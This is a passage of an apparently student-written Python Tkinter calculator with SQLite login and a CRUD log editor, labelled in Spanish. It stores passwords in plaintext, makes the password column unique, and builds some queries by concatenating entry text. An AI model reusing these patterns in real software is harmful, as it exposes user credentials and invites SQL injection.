labelUsr\r\n labelUsr = Label(root, text=\"Usuario:\",font=(\"Arial Bold\", 10))\r\n labelUsr.grid(row=1, padx=50, pady=5)\r\n labelUsr.config(justify=\"center\")\r\n\r\n global entryUsr\r\n entryUsr = Entry(root,validate=\"key\", validatecommand=vncmd)\r\n entryUsr.grid(row=2, padx=5, pady=5)\r\n entryUsr.config(justify=\"center\", state=\"normal\")\r\n\r\n\r\n global labelPass\r\n labelPass = Label(root, text=\"Contraseña:\",font=(\"Arial Bold\", 10))\r\n labelPass.grid(row=3, padx=5, pady=5)\r\n \r\n \r\n global entryPass\r\n entryPass = Entry(root,validate=\"key\", validatecommand=vncmd)\r\n entryPass.grid(row=4, padx=5, pady=5)\r\n entryPass.config(justify=\"center\", show=\"*\")\r\n\r\n global button_acceder\r\n button_acceder = StringVar()\r\n button_acceder.set(\"Acceder\")\r\n\r\n global acc\r\n acc = Button(root, textvariable=button_acceder, command=acceder,font=(\"Arial Bold\", 10))\r\n acc.grid(row=5, padx=5, pady=5)\r\n\r\n global crear\r\n crear = Button(root, text=\"Crear cuenta\", command=crearCuenta,font=(\"Arial Bold\", 10))\r\n crear.grid(row=6, padx=5, pady=5)\r\n global sal\r\n sal = Button(root, text=\"Salir\", command=salirAplicacion,font=(\"Arial Bold\", 10))\r\n sal.grid(row=7, padx=5, pady=5)\r\n entryUsr.focus()\r\n\r\ndef acceder():\r\n Usr = entryUsr.get()\r\n Pass = entryPass.get()\r\n cursor.execute('''SELECT * FROM usuarios WHERE nombre = ? AND contraseña = ? ''',(Usr, Pass))\r\n if cursor.fetchone():\r\n texto.set(\"Calculadora\")\r\n calculadora()\r\n else:\r\n \tmesg.set(\"Los datos son\\nincorrectos!\")\r\n conexion.commit()\r\n\r\ndef crearCuenta():\r\n Usr = entryUsr.get()\r\n Pass = entryPass.get()\r\n\r\n if len(Usr) == 0 or len(Pass) == 0:\r\n return mesg.set(\"Los campos\\nson obligatorios\")\r\n elif len(Usr) < 4:\r\n return mesg.set(\"El nombre de\\nusuario es muy corto\\nMinimo 4 caracteres\")\r\n elif len(Pass) < 6:\r\n return mesg.set(\"La contraseña\\nes muy corta\\nMinimo 6 caracteres\")\r\n elif Usr == Pass:\r\n return mesg.set('No puedes usar\\nel nombre de\\ncontraseña')\r\n else:\r\n try:\r\n data = [Usr, Pass]\r\n cursor.execute(\"\"\"INSERT INTO usuarios VALUES (NUll,?,?)\"\"\",data)\r\n conexion.commit()\r\n mesg.set(\"Cuenta creada!\")\r\n except:\r\n return mesg.set(\"El nombre de usuario\\nya esta en uso\")\r\n\r\ndef calculadora():\r\n msg.grid_remove()\r\n crear.grid_remove()\r\n labelUsr.grid_remove()\r\n labelPass.grid_remove()\r\n entryUsr.grid_remove()\r\n entryPass.grid_remove()\r\n acc.grid_remove()\r\n sal.grid_remove()\r\n\r\n vfcmd = (root.register(on_validateF),'%S','%P')\r\n\r\n label = Label(root,font=(\"Arial Bold\", 10))\r\n label.grid(column=1, row=0, padx=5, pady=5)\r\n label.config(textvariable=texto )\r\n\r\n numero1 = Label(root, text=\"\\nNumero 1 \",font=(\"Arial Bold\", 10))\r\n numero1.grid(row=3, column=0, padx=5, pady=5, sticky=\"se\")\r\n \r\n entryNum = Entry(root, justify=CENTER, textvariable=n1,validate=\"key\", validatecommand=vfcmd)\r\n entryNum.grid(row=4, column=0, padx=5, pady=5, sticky=\"ne\" )\r\n \r\n \r\n numero2 = Label(root, text=\"\\nNumero 2\",font=(\"Arial Bold\", 10))\r\n numero2.grid(row=3, column=1, padx=5, pady=5, sticky=\"s\")\r\n \r\n entryNum2 = Entry(root, justify=CENTER, textvariable=n2,validate=\"key\", validatecommand=vfcmd)\r\n entryNum2.grid(row=4, column=1, padx=5, pady=5, sticky=\"n\")\r\n \r\n \r\n resultado = Label(root, text=\"\\nResultado\",font=(\"Arial Bold\", 10))\r\n resultado.grid(row=3, column=2, padx=5, pady=5, sticky=\"s\")\r\n \r\n resultado2 = Entry(root, justify=CENTER, state=DISABLED, textvariable=r)\r\n resultado2.grid(row=4, column=2, padx=5, pady=5, sticky=\"n\")\r\n \r\n \r\n mas = Button(root, text=\"+\", command=sumar,font=(\"Arial Bold\", 10))\r\n mas.grid(row=3,column=3, padx=5, pady=5, sticky=\"w\", ipadx=8, ipady=5)\r\n \r\n menos = Button(root, text=\"-\", command=restar,font=(\"Arial Bold\", 10))\r\n menos.grid(row=3,column=4, padx=5, pady=5, sticky=\"e\", ipadx=8, ipady=5)\r\n \r\n por = Button(root, text=\"x\", command=multiplicar,font=(\"Arial Bold\", 10))\r\n por.grid(row=4,column=3, padx=5, pady=5, sticky=\"w\", ipadx=8, ipady=5)\r\n \r\n entre = Button(root, text=\"/\", command=dividir,font=(\"Arial Bold\", 10))\r\n entre.grid(row=4,column=4, padx=5, pady=5, sticky=\"e\", ipadx=8, ipady=5)\r\n global bEdit\r\n bEdit = Button(root, text=\"Editar\", command=CRUD,font=(\"Arial Bold\", 10))\r\n bEdit.grid(row=3,column=5, padx=5, pady=5, sticky=\"w\")\r\n \r\n salr = Button(root, text=\"Salir\", command=salirAplicacion,font=(\"Arial Bold\", 10))\r\n salr .grid(row=4,column=5, padx=5, pady=5, sticky=\"w\")\r\n entryNum.focus()\r\n\r\n n1.set('')\r\n n2.set('')\r\n r.set('')\r\n\r\ndef sumar():\r\n try:\r\n r.set( float(n1.get()) + float(n2.get()) )\r\n global operacion\r\n operacion = \"+\"\r\n commit()\r\n borrar()\r\n texto.set('se ha sumado correctamente')\r\n if run:\r\n actualizarHojaDeDatos()\r\n except ValueError:\r\n texto.set(\"Error-\\ningresa los campos correctamente\")\r\n except ZeroDivisionError:\r\n texto.set(\"Error-\\nNo se puede dividir entre cero!\")\r\n except:\r\n texto.set(\"Error-\\ningresa los campos correctamente\")\r\n \r\ndef restar():\r\n try:\r\n r.set( float(n1.get()) - float(n2.get()) )\r\n global operacion\r\n operacion = \"-\"\r\n commit()\r\n borrar()\r\n texto.set('se ha restado correctamente')\r\n if run:\r\n actualizarHojaDeDatos()\r\n except ValueError:\r\n texto.set(\"Error-\\ningresa los campos correctamente\")\r\n except ZeroDivisionError:\r\n texto.set(\"Error-\\nNo se puede dividir entre cero!\") \r\n except:\r\n texto.set(\"Error-\\ningresa los campos correctamente\") \r\n\r\ndef multiplicar():\r\n try:\r\n r.set( float(n1.get()) * float(n2.get()) )\r\n global operacion\r\n operacion = \"*\"\r\n commit()\r\n borrar()\r\n texto.set('se ha multiplicado correctamente')\r\n if run:\r\n actualizarHojaDeDatos()\r\n except ValueError:\r\n texto.set(\"Error-\\ningresa los campos correctamente\")\r\n except ZeroDivisionError:\r\n texto.set(\"Error-\\nNo se puede dividir entre cero!\")\r\n except:\r\n texto.set(\"Error-\\ningresa los campos correctamente\") \r\n\r\ndef dividir():\r\n try:\r\n if float(n1.get()) != 0:\r\n r.set( float(n1.get()) / float(n2.get()) )\r\n global operacion\r\n operacion = \"/\"\r\n commit()\r\n borrar()\r\n texto.set('se ha dividido correctamente')\r\n if run:\r\n actualizarHojaDeDatos()\r\n else:\r\n texto.set(\"Error-\\nNo se puede dividir entre cero!\")\r\n except ValueError:\r\n texto.set(\"Error-\\ningresa los campos correctamente\")\r\n except ZeroDivisionError:\r\n texto.set(\"Error-\\nNo se puede dividir entre cero!\")\r\n except:\r\n texto.set(\"Error-\\ningresa los campos correctamente\") \r\n\r\ndef borrar():\r\n n1.set('')\r\n n2.set('')\r\n\r\ndef commit():\r\n locale.setlocale(locale.LC_ALL, 'es-MX')\r\n dt = datetime.datetime.now(pytz.timezone('Asia/Kolkata'))\r\n fecha = dt.strftime(\"%d/%m/%y\")\r\n hora = dt.strftime(\"%I:%M:%S\")\r\n\r\n\r\n resultado = r.get()\r\n num1 = str(n1.get())\r\n num2 = str(n2.get())\r\n Usr = str(entryUsr.get())\r\n\r\n cursor.execute('INSERT INTO logs (numero1, numero2, operacion, resultado, usuario, fecha, Hora) VALUES (?,?,?,?,?,?,?)',\r\n [\r\n num1,\r\n num2,\r\n operacion,\r\n resultado,\r\n Usr,\r\n fecha,\r\n hora\r\n ])\r\n conexion.commit()\r\n\r\ndef ConexionBDU():\r\n try:\r\n cursor.execute('''CREATE TABLE \"usuarios\" \r\n (\"ID\"\tINTEGER NOT NULL UNIQUE,\r\n \"nombre\"\tVARCHAR(17) NOT NULL UNIQUE,\r\n \"contraseña\"\tVARCHAR(17) NOT NULL UNIQUE,\r\n PRIMARY KEY(\"ID\" AUTOINCREMENT))''') \r\n\r\n cursor.execute(\"\"\"CREATE TABLE \"logs\" (\r\n \"ID\"\tINTEGER NOT NULL UNIQUE,\r\n \"Numero1\"\tVARCHAR(10) NOT NULL,\r\n \"Operacion\"\tVARCHAR(1) NOT NULL,\r\n \"Numero2\"\tVARCHAR(10) NOT NULL,\r\n \"Resultado\"\tVARCHAR(10) NOT NULL,\r\n \"Usuario\"\tVARCHAR(17) NOT NULL,\r\n \"Hora\"\tVARCHAR(10) NOT NULL,\r\n \"Fecha\"\tVARCHAR(10) NOT NULL,\r\n PRIMARY KEY(\"ID\" AUTOINCREMENT)\r\n )\"\"\")\r\n \r\n conexion.commit()\r\n except:\r\n pass\r\n\r\ndef CRUD():\r\n \r\n def wLog():\r\n if e1.get():\r\n cursor.execute(\"SELECT * FROM logs WHERE ID=\"+ e1.get())\r\n if cursor.fetchone() != None:\r\n id = e1.get()\r\n limpiar()\r\n for log in cursor.execute(\"SELECT * FROM logs WHERE ID=\"+id):\r\n e1.insert(0,log[0])\r\n e2.insert(0,log[1])\r\n e3.insert(0,log[2])\r\n e4.insert(0,log[3])\r\n e5.insert(0,log[4])\r\n e6.insert(0,log[5])\r\n e3.config(state=\"readonly\")\r\n e6.config(state=\"readonly\")\r\n else:\r\n messagebox.showerror(\"Error-\", \"El indice no existe!\")\r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce un indice!\")\r\n \r\n bEdit.config(state=DISABLED)\r\n global usrList\r\n usrList = [usr for usr in cursor.execute(\"SELECT nombre FROM usuarios\")]\r\n global raiz\r\n raiz = tkinter.Tk()\r\n raiz.geometry(\"275x300\")\r\n raiz.title(\"CRUD\")\r\n raiz.resizable(0, 0)\r\n vcmd = (raiz.register(on_validate),'%S', '%P')\r\n vfcmd = (raiz.register(on_validateF),'%S', '%P')\r\n Label(raiz, text=\"Editor de datos\",font=(\"Arial Bold\", 10), relief=\"ridge\", borderwidth=5).grid(column=1, row=0, sticky=\"w\")\r\n menubar=Menu(raiz)\r\n menuSalir=Menu(menubar, tearoff=0)\r\n crud=Menu(menubar, tearoff=0)\r\n opciones=Menu(menubar, tearoff=0)\r\n \r\n\r\n crud.add_command(label=\"Añadir\", command=crearRegistro)\r\n crud.add_command(label=\"Leer\", command=ventanaDeDatos)\r\n crud.add_command(label=\"actualizar\", command=actualizar)\r\n crud.add_command(label=\"Borrar\", command=borrarDatos)\r\n menubar.add_cascade(label=\"CRUD\", menu=crud)\r\n\r\n opciones.add_command(label=\"Limpiar campos\", command=limpiar)\r\n opciones.add_command(label=\"Escribir log\", command=wLog)\r\n menubar.add_cascade(label=\"Opciones\", menu=opciones)\r\n\r\n menuSalir.add_command(label=\"Salir\", command=salirAplicacion)\r\n menubar.add_cascade(label=\"Salir\", menu=menuSalir)\r\n\r\n\r\n raiz.config(cursor=\"hand1\",relief=\"ridge\",bd=15, menu=menubar)\r\n\r\n l1=Label(raiz, text=\"ID:\",font=(\"Arial Bold\", 10))\r\n l1.grid(column=0, row=2, sticky=\"e\")\r\n \r\n global e1\r\n e1=Entry(raiz,validate=\"key\", validatecommand=vcmd)\r\n e1.grid(column=1, row=2, sticky=\"w\")\r\n\r\n global l2\r\n l2=Label(raiz, text=\"Numero1:\",font=(\"Arial Bold\", 10))\r\n l2.grid(column=0, row=3, sticky=\"e\")\r\n \r\n global e2\r\n e2=Entry(raiz,validate=\"key\", validatecommand=vfcmd)\r\n e2.grid(column=1, row=3, sticky=\"w\")\r\n \r\n global l3\r\n l3=Label(raiz, text=\"Operacion:\",font=(\"Arial Bold\", 10))\r\n l3.grid(column=0, row=4, sticky=\"e\")\r\n \r\n global e3\r\n e3=ttk.Combobox(raiz, justify=\"center\",width=2, values=[\"+\", \"-\", \"x\", \"/\"],state=\"readonly\")\r\n e3.grid(column=1, row=4, sticky=\"w\")\r\n \r\n global l4\r\n l4=Label(raiz, text=\"Numero2:\",font=(\"Arial Bold\", 10))\r\n l4.grid(column=0, row=5, sticky=\"e\")\r\n \r\n global e4\r\n e4=Entry(raiz,validate=\"key\", validatecommand=vfcmd)\r\n e4.grid(column=1, row=5, sticky=\"w\")\r\n \r\n global l5\r\n l5=Label(raiz, text=\"Resultado:\",font=(\"Arial Bold\", 10))\r\n l5.grid(column=0, row=6, sticky=\"e\")\r\n \r\n global e5\r\n e5=Entry(raiz,validate=\"key\", validatecommand=vfcmd)\r\n e5.grid(column=1, row=6, sticky=\"w\")\r\n \r\n global l6\r\n l6=Label(raiz, text=\"Usuario:\",font=(\"Arial Bold\", 10))\r\n l6.grid(column=0, row=7, sticky=\"e\")\r\n\r\n global e6\r\n e6=ttk.Combobox(raiz, justify=\"left\",width=12,state=\"readonly\")\r\n e6['values']=usrList\r\n e6.grid(column=1, row=7, sticky=\"w\")\r\n \r\n global l7\r\n l7=Label(raiz, text=\"Hora:\",font=(\"Arial Bold\", 10))\r\n l7.grid(column=0, row=8, sticky=\"e\")\r\n \r\n global l8\r\n l8=Label(raiz, text=\"Fecha:\",font=(\"Arial Bold\", 10))\r\n l8.grid(column=0, row=9, sticky=\"e\")\r\n \r\n global b8\r\n global b7\r\n global b2\r\n b8=Button(raiz, text=\"Seleccionar fecha\", command=calendario,font=(\"Arial Bold\", 10))\r\n b8.grid(column=1, row=9, sticky=\"e\")\r\n \r\n b1=Button(raiz, text=\"Create\", command=crearRegistro,font=(\"Arial Bold\", 10))\r\n b1.place(x=0,y=242)\r\n \r\n b2=Button(raiz, text=\"Read\", command=ventanaDeDatos,font=(\"Arial Bold\", 10))\r\n b2.place(x=54,y=242)\r\n \r\n b3=Button(raiz, text=\"Update\", command=actualizar,font=(\"Arial Bold\", 10))\r\n b3.place(x=99,y=242)\r\n\r\n b4=Button(raiz, text=\"Delete\", command=borrarDatos,font=(\"Arial Bold\", 10))\r\n b4.place(x=156,y=242) \r\n\r\n b6=Button(raiz, text=\"Exit\", command=salirAplicacion,font=(\"Arial Bold\", 10))\r\n b6.place(x=209,y=242)\r\n\r\n b7=Button(raiz, text=\"Seleccionar hora\", command=selHora,font=(\"Arial Bold\", 10))\r\n b7.grid(column=1, row=8, sticky=\"w\")\r\n def salirEdit():\r\n try:\r\n bEdit.config(state=NORMAL)\r\n raiz.destroy()\r\n except:\r\n raiz.destroy()\r\n e1.focus()\r\n raiz.protocol(\"WM_DELETE_WINDOW\", salirEdit)\r\n raiz.mainloop() \r\n\r\ndef ventanaDeDatos():\r\n global run\r\n run = True\r\n b2.config(state=DISABLED)\r\n global datos\r\n datos = tkinter.Tk()\r\n datos.title(\"Hoja de datos\")\r\n tree = ttk.Treeview(datos, column=(\"c1\", \"c2\", \"c3\", \"c4\", \"c5\", \"c6\", \"c7\", \"c8\"), show='headings')\r\n \r\n for row in cursor.execute(\"SELECT * FROM logs\"):\r\n tree.insert(\"\", tkinter.END, values=row) \r\n tree.column(\"#1\", anchor=tkinter.CENTER, width=25)\r\n \r\n tree.heading(\"#1\", text=\"ID\")\r\n \r\n tree.column(\"#2\", anchor=tkinter.CENTER, width=50)\r\n \r\n tree.heading(\"#2\", text=\"Primero\")\r\n \r\n tree.column(\"#3\", anchor=tkinter.CENTER, width=40)\r\n \r\n tree.heading(\"#3\", text=\"/x-+\")\r\n \r\n tree.column(\"#4\", anchor=tkinter.CENTER, width=55)\r\n \r\n tree.heading(\"#4\", text=\"Segundo\")\r\n \r\n tree.column(\"#5\", anchor=tkinter.CENTER, width=75)\r\n \r\n tree.heading(\"#5\", text=\"Resultado\")\r\n \r\n tree.column(\"#6\", anchor=tkinter.CENTER, width=75)\r\n \r\n tree.heading(\"#6\", text=\"Usuario\")\r\n \r\n tree.column(\"#7\", anchor=tkinter.CENTER, width=50)\r\n \r\n tree.heading(\"#7\", text=\"Hora\")\r\n \r\n tree.column(\"#8\", anchor=tkinter.CENTER, width=125)\r\n \r\n tree.heading(\"#8\", text=\"Fecha\")\r\n def salirHojaDeDatos():\r\n global run\r\n datos.destroy()\r\n run = False\r\n try:\r\n b2.config(state=NORMAL)\r\n except:\r\n pass\r\n menubar=Menu(datos)\r\n menuOpciones=Menu(menubar, tearoff=0)\r\n\r\n menuOpciones.add_command(label=\"actualizar\", command=actualizarHojaDeDatos)\r\n menuOpciones.add_command(label=\"Salir\", command=salirHojaDeDatos)\r\n menubar.add_cascade(label=\"Opciones\", menu=menuOpciones)\r\n\r\n\r\n datos.resizable(0, 0)\r\n datos.config(cursor=\"hand1\",relief=\"ridge\",bd=15, menu=menubar) \r\n datos.protocol(\"WM_DELETE_WINDOW\",salirHojaDeDatos)\r\n \r\n tree.pack() \r\n\r\ndef actualizarHojaDeDatos():\r\n datos.destroy()\r\n ventanaDeDatos()\r\n\r\ndef crearRegistro():\r\n if e2.get():\r\n if e3.get():\r\n if e4.get():\r\n if e5.get():\r\n result()\r\n if e6.get():\r\n if resultadoAuto != None:\r\n if newTime:\r\n if newDate:\r\n datos=e2.get(),e3.get(),e4.get(),resultadoAuto,e6.get(),newTime,newDate\r\n cursor.execute(\"INSERT INTO logs VALUES(NULL,?,?,?,?,?,?,?)\", (datos))\r\n conexion.commit()\r\n messagebox.showinfo(\"BBDD\",\"Registro insertado con éxito\")\r\n limpiar()\r\n e3.config(state=\"readonly\")\r\n e6.config(state=\"readonly\")\r\n if run:\r\n actualizarHojaDeDatos()\r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce la fecha!\")\r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce la hora!\")\r\n else:\r\n pass\r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce el usuario!\") \r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce el resultado!\")\r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce el segundo numero!\")\r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce el signo!\")\r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce el primer numero!\")\r\n\r\ndef actualizar():\r\n if e1.get():\r\n cursor.execute(\"SELECT * FROM logs WHERE ID=\"+ e1.get())\r\n if cursor.fetchone() != None:\r\n if e2.get():\r\n if e3.get():\r\n if e4.get():\r\n if e5.get():\r\n result()\r\n if e6.get():\r\n if resultadoAuto != None:\r\n if newTime != None:\r\n if newDate != None:\r\n datos=e2.get(),e3.get(),e4.get(),resultadoAuto,e6.get(),newTime,newDate\r\n cursor.execute(\"UPDATE logs SET Numero1=?, Operacion=?, Numero2=?, Resultado=?, Usuario=?, Hora=?, Fecha=? \"+\r\n \"WHERE ID=\" + e1.get(),(datos))\r\n conexion.commit()\r\n messagebox.showinfo(\"BBDD\",\"Registro actualizado con éxito\")\r\n limpiar()\r\n e3.config(state=\"readonly\")\r\n e6.config(state=\"readonly\")\r\n if run:\r\n actualizarHojaDeDatos()\r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce una fecha!\") \r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce una hora!\")\r\n else:\r\n pass\r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce un usuario!\") \r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce un resultado!\") \r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce \\nel segundo numero!\") \r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce un signo!\") \r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce \\nel primer numero!\") \r\n else:\r\n messagebox.showerror(\"Error-\", \"El indice no existe!\") \r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce el indice que quieres actualizar!\") \r\n\r\ndef borrarDatos():\r\n\r\n if e1.get():\r\n cursor.execute(\"SELECT * FROM logs WHERE ID=\"+ e1.get())\r\n if cursor.fetchone() != None:\r\n r = messagebox.askyesno(\"Confirmar\", \"Estas seguro que\\nquieres eliminar este registro?\")\r\n if r:\r\n cursor.execute(\"DELETE FROM logs WHERE ID=\" + e1.get())\r\n conexion.commit()\r\n messagebox.showinfo(\"BBDD\",\"Registro borrado con éxito\")\r\n limpiar()\r\n else:\r\n messagebox.showerror(\"Error-\", \"El indice no existe\")\r\n\r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce el indice\\nque quieres eliminar!\")\r\n\r\ndef result():\r\n \r\n try:\r\n global resultadoAuto\r\n resultadoAuto = None\r\n if float(e2.get()) == 0 and e3.get() == \"/\":\r\n return messagebox.showerror(\"Error-\", \"No se puede dividir entre cero\")\r\n else:\r\n if e3.get() == \"+\":\r\n if float(e2.get()) + float(e4.get()) != float(e5.get()):\r\n valor=messagebox.askquestion(\"Error-\",\"El resultado que pusiste esta mal\\nquieres que se ponga el resultado correcto automaticamente?\")\r\n if valor == \"yes\":\r\n resultadoAuto = float(e2.get()) + float(e4.get())\r\n else:\r\n resultadoAuto = float(e5.get())\r\n else:\r\n resultadoAuto = float(e5.get())\r\n elif e3.get() == \"-\":\r\n if float(e2.get()) - float(e4.get()) != float(e5.get()):\r\n valor=messagebox.askquestion(\"Error-\",\"El resultado que pusiste esta mal\\nquieres que se ponga el resultado correcto automaticamente?\")\r\n if valor == \"yes\":\r\n resultadoAuto = float(e2.get()) - float(e4.get())\r\n else:\r\n resultadoAuto = float(e5.get())\r\n else:\r\n resultadoAuto = float(e5.get())\r\n elif e3.get() == \"x\":\r\n if float(e2.get()) * float(e4.get()) != float(e5.get()):\r\n valor=messagebox.askquestion(\"Error-\",\"El resultado que pusiste esta mal\\nquieres que se ponga el resultado correcto automaticamente?\")\r\n if valor == \"yes\":\r\n resultadoAuto = float(e2.get()) * float(e4.get())\r\n else:\r\n resultadoAuto = float(e5.get())\r\n else:\r\n resultadoAuto = float(e5.get())\r\n elif e3.get() == \"/\":\r\n if float(e2.get()) / float(e4.get()) != float(e5.get()):\r\n valor=messagebox.askquestion(\"Error-\",\"El resultado que pusiste esta mal\\nquieres que se ponga el resultado correcto automaticamente?\")\r\n if valor == \"yes\":\r\n resultadoAuto = float(e2.get()) / float(e4.get())\r\n else:\r\n resultadoAuto = float(e5.get())\r\n else:\r\n resultadoAuto = float(e5.get())\r\n except NameError:\r\n return messagebox.showerror(\"Error-\", \"Introduce un signo!\")\r\n except ValueError:\r\n return messagebox.showerror(\"Error-\", \"Introduce bien los campos!\")\r\n except ZeroDivisionError:\r\n return messagebox.showerror(\"Error-\", \"No se puede dividir entre cero\")\r\n\r\ndef limpiar():\r\n\r\n e1.grid_forget()\r\n e2.grid_forget()\r\n e3.grid_forget()\r\n e4.grid_forget()\r\n e5.grid_forget()\r\n e6.grid_forget()\r\n def limpiar2():\r\n global e1\r\n global e2\r\n global e3\r\n global e4\r\n global e5\r\n global e6\r\n global resultadoAuto\r\n global newDate\r\n global newTime\r\n\r\n resultadoAuto = None\r\n newDate = None\r\n newDate = None\r\n vcmd = (raiz.register(on_validate),'%S', '%P')\r\n vfcmd = (raiz.register(on_validateF),'%S', '%P')\r\n e1=Entry(raiz,validate=\"key\", validatecommand=vcmd)\r\n e1.grid(column=1, row=2, sticky=\"w\")\r\n\r\n e2=Entry(raiz,validate=\"key\", validatecommand=vfcmd)\r\n e2.grid(column=1, row=3, sticky=\"w\")\r\n\r\n e3=ttk.Combobox(raiz, justify=\"center\",width=2, values=[\"+\", \"-\", \"x\", \"/\"])\r\n e3.grid(column=1, row=4, sticky=\"w\")\r\n \r\n e4=Entry(raiz,validate=\"key\", validatecommand=vfcmd)\r\n e4.grid(column=1, row=5, sticky=\"w\")\r\n\r\n e5=Entry(raiz,validate=\"key\", validatecommand=vfcmd)\r\n e5.grid(column=1, row=6, sticky=\"w\")\r\n\r\n e6=ttk.Combobox(raiz, justify=\"left\",width=12)\r\n e6['values']=usrList\r\n e6.grid(column=1, row=7, sticky=\"w\")\r\n limpiar2()\r\n\r\ndef selHora():\r\n global hora\r\n b7.config(state=DISABLED)\r\n hora = Tk()\r\n hora.resizable(0,0)\r\n hora.title(\"Hora\")\r\n hora.config(cursor=\"hand1\",relief=\"ridge\",bd=15)\r\n\r\n\r\n def cancelHora():\r\n hora.destroy()\r\n try:\r\n b7.config(state=NORMAL)\r\n except:\r\n pass\r\n\r\n\r\n def confirmarHora():\r\n confirmarButton.config(state=DISABLED)\r\n global newTime\r\n m = min_sb.get()\r\n h = sec_hour.get()\r\n s = sec.get()\r\n t = f\"La hora seleccionada es {m}:{h}:{s}.\\nEs correcto?\"\r\n res = messagebox.askquestion(\"Confirmar\", t)\r\n if res == \"yes\":\r\n newTime = f\"{m}:{h}:{s}\"\r\n try:\r\n hora.destroy()\r\n except:\r\n pass\r\n try:\r\n b7.config(state=NORMAL)\r\n except:\r\n pass\r\n else:\r\n try:\r\n confirmarButton.config(state=NORMAL)\r\n except:\r\n pass\r\n fone = Frame(hora)\r\n ftwo = Frame(hora)\r\n\r\n fone.pack(pady=10)\r\n ftwo.pack(pady=10)\r\n\r\n min_sb = Spinbox(\r\n ftwo,\r\n from_=0,\r\n to=23,\r\n wrap=True,\r\n width=2,\r\n state=\"readonly\",\r\n font=(\"Arial Bold\", 30),\r\n justify=CENTER\r\n )\r\n sec_hour = Spinbox(\r\n ftwo,\r\n from_=0,\r\n to=59,\r\n wrap=True,\r\n state=\"readonly\",\r\n font=(\"Arial Bold\", 30),\r\n width=2,\r\n justify=CENTER\r\n )\r\n\r\n sec = Spinbox(\r\n ftwo,\r\n from_=0,\r\n state=\"readonly\",\r\n to=59,\r\n wrap=True,\r\n textvariable=sec_hour,\r\n width=2,\r\n font=(\"Arial Bold\", 30),\r\n justify=CENTER\r\n )\r\n\r\n min_sb.pack(side=LEFT, fill=X, expand=True)\r\n sec_hour.pack(side=LEFT, fill=X, expand=True)\r\n sec.pack(side=LEFT, fill=X, expand=True)\r\n\r\n msg = Label(\r\n hora, \r\n text=\" Hora Minutos Segundos\",\r\n font=(\"Arial Bold\", 10),\r\n )\r\n msg.pack(side=TOP)\r\n\r\n confirmarButton =Button(\r\n hora,\r\n text=\"Confirmar\",\r\n font=(\"Arial Bold\", 10),\r\n padx=5,\r\n\r\n command=confirmarHora\r\n )\r\n confirmarButton.pack(side=RIGHT, pady=10, padx=20)\r\n\r\n cancelButton =Button(\r\n hora,\r\n text=\"Cancelar\",\r\n font=(\"Arial Bold\", 10),\r\n padx=5,\r\n\r\n command=cancelHora\r\n )\r\n cancelButton.pack(pady=10, padx=20, side=LEFT)\r\n\r\n\r\n hora.protocol(\"WM_DELETE_WINDOW\", confirmarHora)\r\n hora.mainloop()\r\n\r\ndef calendario():\r\n b8.config(state=DISABLED)\r\n global fecha \r\n fecha = tkinter.Tk()\r\n fecha.title(\"Fecha\")\r\n fecha.geometry(\"262x245\")\r\n global newDate\r\n\r\n cal = Calendar(fecha, locale=\"es_MX\", selectmode = 'day',\r\n year = 2021, month = 7,\r\n day = 19,font=(\"Arial Bold\", 10),\r\n showothermonthdays=False,\r\n showweeknumbers=False, \r\n mindate=datetime.date(year=2020, month=1, day=1), \r\n maxdate=datetime.date(year=2022, month=12, day=31))\r\n \r\n cal.grid(row=0 , column=0)\r\n def cancelCalendario():\r\n fecha.destroy()\r\n try:\r\n b8.config(state=NORMAL)\r\n except:\r\n pass\r\n\r\n def confirmarCalendario():\r\n bc.config(state=DISABLED)\r\n t = \"La fecha seleccionada es {}.\\nEs correcto?\".format(cal.get_date())\r\n v = messagebox.askyesno(\"Confirmar\", t)\r\n if v:\r\n global newDate\r\n newDate = cal.get_date()\r\n try:\r\n b8.config(state=NORMAL)\r\n except:\r\n pass\r\n try:\r\n fecha.destroy()\r\n except:\r\n pass\r\n else:\r\n try:\r\n bc.config(state=NORMAL)\r\n except:\r\n pass\r\n \r\n bc = Button(fecha, text = \"Confirmar\",width=10,\r\n command = confirmarCalendario,font=(\"Arial Bold\", 10))\r\n bc.place(x=126, y=182)\r\n Button(fecha, text = \"Cancelar\", width=10,\r\n command = cancelCalendario,font=(\"Arial Bold\", 10)).place(x=15, y=182)\r\n\r\n\r\n fecha.config(cursor=\"hand1\",relief=\"ridge\",bd=15)\r\n fecha.resizable(0,0)\r\n fecha.protocol(\"WM_DELETE_WINDOW\", confirmarCalendario)\r\n\r\n fecha.mainloop() \r\n\r\ndef on_validateN(text, new_text):\r\n if text.isalnum() and len(new_text) < 17:\r\n return True\r\n else:\r\n return False\r\n\r\ndef on_validateF(text, new_text):\r\n if all(c in \"0123456789.\" for c in text) and len(new_text) < 10:\r\n return True\r\n else:\r\n return False\r\n\r\ndef on_validate(text, new_text):\r\n if text.isdecimal() and len(new_text) < 3:\r\n return True\r\n else:\r\n return False\r\n\r\ndef salirAplicacion():\r\n \r\n valor=messagebox.askquestion(\"Salir\",\"¿Deseas salir de la aplicacion?\")\r\n if valor==\"yes\":\r\n root.destroy()\r\n try:\r\n raiz.destroy()\r\n except:\r\n pass\r\n try:\r\n datos.destroy()\r\n except:\r\n pass\r\n try:\r\n hora.destroy()\r\n except:\r\n pass\r\n try:\r\n fecha.destroy()\r\n except:\r\n pass\r\n# aasel\r\ninicio()\r\nroot.mainloop() \r\nconexion.close()","sub_path":"PythonEjercicio3.0/PythonEjercicio4.py","file_name":"PythonEjercicio4.py","file_ext":"py","file_size_in_byte":30910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"347712318","text":"import os\nimport matplotlib.pyplot as plt\nimport 